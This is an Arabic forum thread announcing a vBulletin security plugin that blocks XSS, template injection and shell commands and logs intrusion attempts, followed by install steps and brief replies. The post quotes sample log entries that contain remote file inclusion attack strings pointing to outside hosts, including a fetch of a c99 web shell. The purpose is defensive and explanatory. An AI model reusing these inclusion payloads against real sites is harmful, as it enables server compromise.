الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني

ياخذ ومايعطي · #1 (**permalink**) 12-24-2007, 03:11 PM

السلام عليكم ورحمة الله وبركاته

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.0
المبرمجين : الفريق الامني
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة

عمل الهاك : حماية المنتدى بشكل كامل بعون الله

[/align]

الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

كود PHP:

  2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808

2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

 
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79

2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)

الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

كود PHP:

التاريخ والوقت

كود PHP:

  2007-12-11, 05:50:44,

عدد المحاولات

كود PHP:

1197370244

ايبي الموقع المصااب

كود PHP:

  209.67.223.188

الاصابة طبعا تشفرت لاغراض امنيه

كود PHP:

  p=11575//codebb/lang_select

الاستغلال

كود PHP:

  ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

كود PHP:

  libwww-perl/5.808

الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث

شرح حذف الهاك

من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت

تم تجربت المنتج على الاصدار

3.6.x

3.7.0

لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

يطرحه هنا في الموضوع لنصل لتطوير اكثر

وجل من لا يخطأ وشكرا لكم

رابط الموضوع الاصلي
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع]

ياخذ ومايعطي · #2 (**permalink**) 01-07-2008, 05:31 PM

مافي كلمت مشكور

اضن احصلها يوم تطير مواقعكم

؟؟

المعاتب · #3 (**permalink**) 01-07-2008, 06:16 PM

مشكووور اخوي على الهاك

parklane · #4 (**permalink**) 01-07-2008, 06:45 PM

يعن ايش اعطي التصريح 666 counter.txt logfile_hacker.txt
ممكن تشرح لينا ومشكور ماقصرت

qqqq2222 · #5 (**permalink**) 01-11-2008, 08:02 PM

مشكور اخوي على المجهود
وانت النك نيم حقك ياخذ ومايعطي لا تستغرب اذا احد سواها هههههههههههههههههههههههههههههههههههههههههههههه

امزح معاك

استضافة مواقع	معنى كلمة	رسائل مسجات vshzg ls[hj	دردشة شات ]v]am ahj	افلام مقاطع فلم مقطع
مكتبة فلاش اسلامي	الثقافة الجنسية	صور في صورة	شات صوتي	الأسره المسلمه
ابتسامات خلفيات	العاب جديدة	دليل مواقع	احداثيات gps	القرآن الكريم
بطاقات كروت	جوال موبايل	جافا java	قصص روايات	sitemap
كتب الكترونية	ماسنجر في مسنجر	خطوط	وصلات روابط	العاب بنات للبنات فقط

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني

هاكات بلاقن برودكت Product - Plugins - hacks منتدى الهاكات